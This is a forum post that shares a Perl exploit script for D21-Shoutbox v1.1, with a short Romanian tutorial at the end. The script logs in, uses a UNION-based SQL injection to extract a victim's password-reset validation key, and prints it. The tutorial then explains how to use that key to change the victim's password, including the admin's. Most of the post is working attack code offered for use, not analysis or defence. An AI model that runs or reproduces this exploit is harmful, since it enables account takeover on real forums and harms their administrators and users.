D21-Shoutbox v1.1 Exploit Admin Password Change

[Screech]

Exploit:

################################################

#!/usr/bin/perl #

# D21-Shoutbox v1.1 Exploit Admin Password Change #

# Author: Synsta #

# Usuage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431 #

# Orginal Exploit Found by Windak & langtuhaohoa #

################################################

use HTTP::Cookies;

use LWP 5.64;

use HTTP::Request;

# variables

my $login_page = '?act=Login&CODE=01';

my $id = '';

my $table_fix = '';

my $pose_pm_page = '?';

my $tries = 5;

my $sql = '';

my $i;

my $j;

# objects

my $ua = LWP::UserAgent->new;

my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);

my $resp;

# init the cookie jar

$ua->cookie_jar ($cj);

# allow redirects on post requests

push @{ $ua->requests_redirectable }, "POST";

# get user input

print 'Shoutbox URL (ex: forumurl.com/forum): ';

chomp (my $base_url = <STDIN>);

print 'Your Username: ';

chomp (my $user = <STDIN>);

$form{entered_name} = $user;

print 'Your Password: ';

# systems without stty will error otherwise

my $stty = -x '/bin/stty';

system 'stty -echo' if $stty; # to turn off echoing

chomp (my $pass = <STDIN>);

system 'stty echo' if $stty; # to turn it back on

print "n" if $stty;

print 'ID:'; # it'll say next to one of their posts

chomp (my $id = <STDIN>);

print 'Table prefix (ex: ibf_): ';

chomp ( my $table_fix = <STDIN>);

if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }

if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' }

do {

$resp = $ua->post ($base_url . $login_page,

[ UserName => $user,

PassWord => $pass,

CookieDate => 1,

]);

} while ($tries-- && !$resp->is_success());

# did we get 200 (OK) ?

if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" }

# was the pass right ?

if ($resp->content =~ /sorry, the password was wrong/i) {

die "Error: password incorrect.n";

}

$| = 1;

print "nAttempting to extract validation key from the database...n ";

$sql = "?act=Shoutbox&view=mycp?=ignored&do=add&id=-1 union select vid,1,1 from ".$table_fix."validating where member_id=". $id ."/*";

$resp = $ua->get ($base_url . $post_pm_page . $sql );

if (!$resp->is_success()) {

print "ERROR" ;

}

else {

print "" ;

#print $resp->content;

$rs=$resp->content;

if ( $rs =~ /uid=([a-z,0-9]{32})/ ) { print "nValidation Key: "; print $1 ;

print "n nAuthor: Synstan";

print "Website: w4ck1ng.comn";

print "Usage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431n";

}

else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;}

}

<STDIN>;[/list:u]

Tut:

1.Du-te in forumul unde e instalat shoutbox-ul, acum click pe formul I've forgotten my password! Click here! pune nicul celui care vrei sa-i schimbi parola si codul si apasa Proceed

2. Ruleaza exploitul

3. Acum veti primi Validation Key, acum du-te la formul de validare (site/forum/index.php?act=Reg&CODE=lostpassform de obicei), pune id-ulvictimei, key-ul... si ai schimbat parola